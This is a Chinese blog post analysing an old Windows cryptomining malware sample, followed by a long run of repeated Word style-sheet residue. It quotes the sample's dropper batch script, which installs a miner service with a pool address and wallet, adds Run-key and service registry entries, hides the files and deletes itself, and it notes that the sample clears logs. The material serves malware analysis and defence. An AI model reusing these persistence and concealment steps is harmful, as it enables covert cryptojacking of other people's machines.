0x00 概述
本来是想分析一下Sodinokibi病毒的新的变种,但是分析了一部分,被它的混淆和循环弄得有点头疼,东西还都是压在内存里。偶然翻到几年前的一个样本分析,又重新看了一下,发现自己在逆向这块几年了,也没实质性的提升,真是光阴喂了狗。这个样本是一个挖矿样本,那时候的挖矿样本还是直接把CPU干到100%,还没有后来样本那样CPU占用率可配置。整体的恶意样本思路也比较清晰,就是挖矿赚钱,尽量让管理员没有办法追踪,即使定位到了恶意程序也让他不容易删掉。
1.1 基本信息
文件名 |
explorer.exe |
文件大小 |
5455872 KB |
文件MD5 |
721e7123e2a413fb8fd4dc6262473f57 |
文件SHA1 |
89c8b778d6f56a7974357cc104ccdcb51169d907 |
文件SHA256 |
3966f7a96536ac2435056d0860ecb8fbc3cf52f665c48fa303149bc423fe6d3a |
文件CRC |
70AB0903 |
文件类型 |
exe |
1.2 分析环境
系统 | win7 x64 |
软件 | IDA,OD |
0x01 功能描述
样本主要的功能是释放各种文件,其中包括挖矿客户端、守护程序及其他的痕迹清除、权限驻留等操作脚本。样本的目的就是为矿池wakuang.aimezi.com,钱包地址:49oJQsyUYU5GuH9hKDhdQhXvCZJT92pr27RzhmMY4uhyjSEoMXom6ciBbC4kTpwUitcXbahCuFqW6dvUr9kcBzKA8iYXics进行挖矿。
0x02 样本调试分析
1.查壳。样本没有进行加壳。
2.样本创建投放文件
对样本动态调试检测,发现样本创建并投放了5个恶意文件,其一就是创建投放conhosts.exe文件即挖矿的客户端程序。
二是创建并投放server.reg,
Server.reg内容
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ServiceMains]
"Description"="Performance library information from Windows Management Instrumentation (WMI) providers to clients on the network. This service only runs when Performance Data Helper is activated."
"DisplayName"="WMI Adapter Services"
其三是创建并投放restart.reg
restart.reg内容
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Tomcat"=""C:\\Windows\\system\\svchost.exe"
其四是释放恶意的csrss.exe程序,对挖矿客户端(conhosts.exe)有守护作用。
并建立了相应的注册表项
其五是创建并投放1.bat。
1.bat内容如下所示,通过1.bat的内容可以知道,脚本的作用是启动挖矿客户端,启动相关恶意程序,导入前面两个注册表文件,并完成相关脚本的删除工作;此外还通过attrib +s +h把释放到C:\Windows\Fonts目录下的挖矿程序及其依赖DLL设置为系统、隐藏属性,使管理员不容易发现这些文件。
@csrss.exe install WindowsATE conhosts -a cryptonight -o stratum+tcp://wakuang.aimezi.com:7777 -u 49oJQsyUYU5GuH9hKDhdQhXvCZJT92pr27RzhmMY4uhyjSEoMXom6ciBbC4kTpwUitcXbahCuFqW6dvUr9kcBzKA8iYXics -p x -nofee 1 -dbg -1 -t 1
@csrss.exe start WindowsATE
@C:\Windows\regedit /s server.reg
@C:\Windows\regedit /s restart.reg
@del server.reg
@del restart.reg
@attrib +s +h C:\Windows\Fonts\conhosts.exe
@attrib +s +h C:\Windows\Fonts\libcurl.dll
@attrib +s +h C:\Windows\Fonts\libeay32.dll
@attrib +s +h C:\Windows\Fonts\libgcc_s_seh-1.dll
@attrib +s +h C:\Windows\Fonts\libstdc++-6.dll
@attrib +s +h C:\Windows\Fonts\libwinpthread-1.dll
@attrib +s +h C:\Windows\Fonts\ssleay32.dll.dll
@attrib +s +h C:\Windows\Fonts\msvcr71.dll
@attrib +s +h C:\Windows\Fonts\csrss.dll
@attrib +s +h C:\Windows\Fonts\zlib1.dll
@del %0
3. 创建安装服务启动项,在逆向代码中可以看到,安装了WindowsATE服务项。
4.清除日志操作。从样本的静态及动态分析结果来看,样本在运行的时候会执行清除日志的命令。
通过IDA的静态分析也发现了相关的日志清除命令。
5.启动挖矿客户端的命令行代码,矿池地址,通信端口等。 对样本进行逆向,可以看到启动客户端的地址,端口等信息。
0x03 总结
就是一个简单的挖矿样本分析,当时这个样本出现的时候,正是Struts2漏洞大杀四方的时候,很多都是通过Struts2漏洞进行投放的。
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}
@font-face{
font-family:"宋体";
}
@font-face{
font-family:"Arial";
}
p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}
p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}
p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}
span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}
span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
原文地址:https://www.cnblogs.com/A66666/p/5bac0905ef9d9f470a0d279a83165789.html